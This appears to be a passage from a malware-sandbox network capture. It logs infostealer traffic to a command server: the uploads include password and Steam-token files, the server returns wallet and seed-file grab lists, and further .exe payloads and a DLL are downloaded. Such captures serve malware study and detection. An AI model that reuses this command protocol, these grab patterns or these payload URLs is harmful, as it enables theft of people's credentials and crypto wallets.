Sep 4, 2024 17:38:05.019148111 CEST	617	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAF Host: 147.45.68.138 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a [TRUNCATED] Data Ascii: ------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="file_data"------DAKEHIJJKEGIDHIEHDAF--
Sep 4, 2024 17:38:05.780338049 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Sep 4, 2024 17:38:06.400183916 CEST	617	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCBGDGCAAKJEBFIDBAAA Host: 147.45.68.138 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 41 41 4b 4a 45 42 46 49 44 42 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 47 44 47 43 [TRUNCATED] Data Ascii: ------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------HCBGDGCAAKJEBFIDBAAAContent-Disposition: form-data; name="file_data"------HCBGDGCAAKJEBFIDBAAA--
Sep 4, 2024 17:38:07.149029970 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Sep 4, 2024 17:38:13.344369888 CEST	511	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAEHJJKFCAAFHJKFBKK Host: 147.45.68.138 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 2d 2d 0d 0a Data Ascii: ------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="mode"3------HCAEHJJKFCAAFHJKFBKK--
Sep 4, 2024 17:38:14.130673885 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 [TRUNCATED] Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzfDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxwYXNzcGhyYXNlLmpzb258MHxFeG9kdXN8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHNlZWQuc2Vjb3wwfEV4b2R1c3wxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RXhvZHVzfDF8XEV4b2R1c1xiYWNrdXBzXHwqLip8MXxFbGVjdHJvbiBDYXNofDF8XEVsZWN0cm9uQ2FzaFx3YWxsZXRzXHwqLip8MHxNdWx0aURvZ2V8MXxcTXVsdGlEb2d [TRUNCATED]
Sep 4, 2024 17:38:14.130796909 CEST	1150	IN	Data Raw: 64 47 39 79 59 57 64 6c 58 47 78 6c 64 6d 56 73 5a 47 4a 63 66 43 6f 75 4b 6e 77 77 66 45 4a 70 62 6d 46 75 59 32 56 38 4d 58 78 63 51 6d 6c 75 59 57 35 6a 5a 56 78 38 59 58 42 77 4c 58 4e 30 62 33 4a 6c 4c 6d 70 7a 62 32 35 38 4d 48 78 43 61 57 Data Ascii: dG9yYWdlXGxldmVsZGJcfCouKnwwfEJpbmFuY2V8MXxcQmluYW5jZVx8YXBwLXN0b3JlLmpzb258MHxCaW5hbmNlfDF8XEJpbmFuY2VcfHNpbXBsZS1zdG9yYWdlLmpzb258MHxCaW5hbmNlfDF8XEJpbmFuY2VcfC5maW5nZXItcHJpbnQuZnB8MHxDb2lub21pfDB8XENvaW5vbWlcQ29pbm9taVx3YWxsZXRzXHwqLndhbGx
Sep 4, 2024 17:38:14.327692986 CEST	511	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGDBFIJKEBGIDGDHCGC Host: 147.45.68.138 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 2d 2d 0d 0a Data Ascii: ------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="mode"4------KEGDBFIJKEBGIDGDHCGC--
Sep 4, 2024 17:38:15.117708921 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e 52 6a 4b 69 34 71 4c 43 70 69 61 58 52 6d 62 48 6c 6c 63 69 6f 75 4b 69 77 71 61 33 56 6a 62 32 6c 75 4b 69 34 71 4c 43 70 6f 64 57 39 69 61 53 6f 75 4b 69 77 71 63 47 39 73 62 32 35 70 5a 58 67 71 4c 69 6f 73 4b 6d 74 79 59 [TRUNCATED] Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0YnRjKi4qLCpiaXRmbHllciouKiwqa3Vjb2luKi4qLCpodW9iaSouKiwqcG9sb25pZXgqLiosKmtyYWtlbiouKiwqb2tleCouKiwqYmluYW5jZSouKiwqYml0ZmluZXgqLiosKmdkYXgqLiosKmV0aGVyZXVtKi4qLCpleG9kdXMqLiosKm1ldGFtYXNrKi4qLCpteWV0aGVyd2FsbGV0Ki4qLCplbGVjdHJ1bSouKiwqYml0Y29pbiouKiwqYmxvY2tjaGFpbiouKiwqY29pbm9taSouKiwqd29yZHMqLiosKm1ldGEqLiosKm1hc2sqLiosKmV0aCouKiwqcmVjb3ZlcnkqLip8MTUwfDN8KndpbmRvd3MqLCpQcm9ncmFtIEZpbGVzKiwqUHJvZ3JhbSBGaWxlcyAoeDg2KSosKkFwcERhdGEqLCpQcm9ncmFtRGF0YSosKi5sbmssKi5leGUsKi5zY3IsKi5jb20sKi5waWYsKi5tcDN8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl [TRUNCATED]
Sep 4, 2024 17:38:15.467436075 CEST	641	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEGCBFHJDHJJKFIDBGIJ Host: 147.45.68.138 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 [TRUNCATED] Data Ascii: ------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="file_data"196mUw==------IEGCBFHJDHJJKFIDBGIJ--
Sep 4, 2024 17:38:16.030550003 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Sep 4, 2024 17:38:16.216140032 CEST	183	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKEHDBAEGIIIEBGCAAFH Host: 147.45.68.138 Content-Length: 130725 Connection: Keep-Alive Cache-Control: no-cache
Sep 4, 2024 17:38:17.822503090 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Sep 4, 2024 17:38:18.326683044 CEST	511	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGHCBKKKFHCGCBFIJEHD Host: 147.45.68.138 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 2d 2d 0d 0a Data Ascii: ------EGHCBKKKFHCGCBFIJEHDContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------EGHCBKKKFHCGCBFIJEHDContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------EGHCBKKKFHCGCBFIJEHDContent-Disposition: form-data; name="mode"5------EGHCBKKKFHCGCBFIJEHD--
Sep 4, 2024 17:38:19.003532887 CEST	338	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 61 34 0d 0a 4d 54 41 32 4d 54 51 79 4e 58 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 77 63 6d 39 6e 4c 7a 59 32 5a 44 63 77 4e 7a 64 68 4d 6a 41 32 4e 47 52 66 62 43 35 6c 65 47 56 38 4d 58 78 72 61 32 74 72 66 44 45 77 4e 6a 45 30 4d 6a 5a 38 61 48 52 30 63 44 6f 76 4c 7a 45 30 4e 79 34 30 4e 53 34 30 4e 43 34 78 4d 44 51 76 63 48 4a 76 5a 79 38 32 4e 6d 51 33 4d 44 63 33 4e 57 4d 31 4e 44 68 6b 58 33 59 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: a4MTA2MTQyNXxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9wcm9nLzY2ZDcwNzdhMjA2NGRfbC5leGV8MXxra2trfDEwNjE0MjZ8aHR0cDovLzE0Ny40NS40NC4xMDQvcHJvZy82NmQ3MDc3NWM1NDhkX3YuZXhlfDF8a2tra3w=0

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.6	53048	147.45.68.138	80

Timestamp	Bytes transferred	Direction	Data
Sep 4, 2024 17:38:01.187777042 CEST	95	OUT	GET /sql.dll HTTP/1.1 Host: 147.45.68.138 Connection: Keep-Alive Cache-Control: no-cache
Sep 4, 2024 17:38:01.790636063 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Sep 2024 15:38:01 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Fri, 24 Nov 2023 13:43:06 GMT Connection: keep-alive ETag: "6560a86a-258600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZYPELi`e!% {D %@#6$($$`#8x#@$.textG `.rdata" $ @@.data4\| $b#@.idata$^$@@.00cfg$p$@@.rsrc$r$@@.reloc5$$@B
Sep 4, 2024 17:38:01.790657997 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc cc cc cc cc e9 8b 17 1c 00 e9 a0 11 1d 00 e9 bf ab 1b 00 e9 a2 44 1c 00 e9 3b 27 1d 00 e9 cc 5a 1d 00 e9 95 a9 1c 00 e9 Data Ascii: D;'ZRxs\tNg4^0Gb&OlpjBT%{rf:%oR}r
Sep 4, 2024 17:38:01.790677071 CEST	128	IN	Data Raw: e9 de dd 1a 00 e9 38 5b 1e 00 e9 03 3c 1c 00 e9 d8 5a 1b 00 e9 36 f6 1d 00 e9 a1 53 1c 00 e9 fd 8f 1c 00 e9 5c c1 1b 00 e9 7e a0 1a 00 e9 cf ff 1e 00 e9 f6 9f 1a 00 e9 68 00 1e 00 e9 b8 b0 1f 00 e9 32 5a 1d 00 e9 43 81 1e 00 e9 c5 06 1b 00 e9 b0 Data Ascii: 8[<Z6S\~h2ZC;<V.++-9nq
Sep 4, 2024 17:38:01.796739101 CEST	1236	IN	Data Raw: 00 00 e9 1e ae 1d 00 e9 28 c7 1e 00 e9 ef 2b 1c 00 e9 1e a3 1b 00 e9 3a 46 1c 00 e9 45 73 1e 00 e9 b0 6b 03 00 e9 f7 61 1b 00 e9 39 5f 1a 00 e9 55 85 1e 00 e9 b4 60 1a 00 e9 07 47 1c 00 e9 15 f8 1d 00 e9 95 69 1b 00 e9 0a 59 1a 00 e9 cd f8 1c 00 Data Ascii: (+:FEska9_U`GiY! O<'_zBo0q :7a8K_o}vaGrOe]yxBc
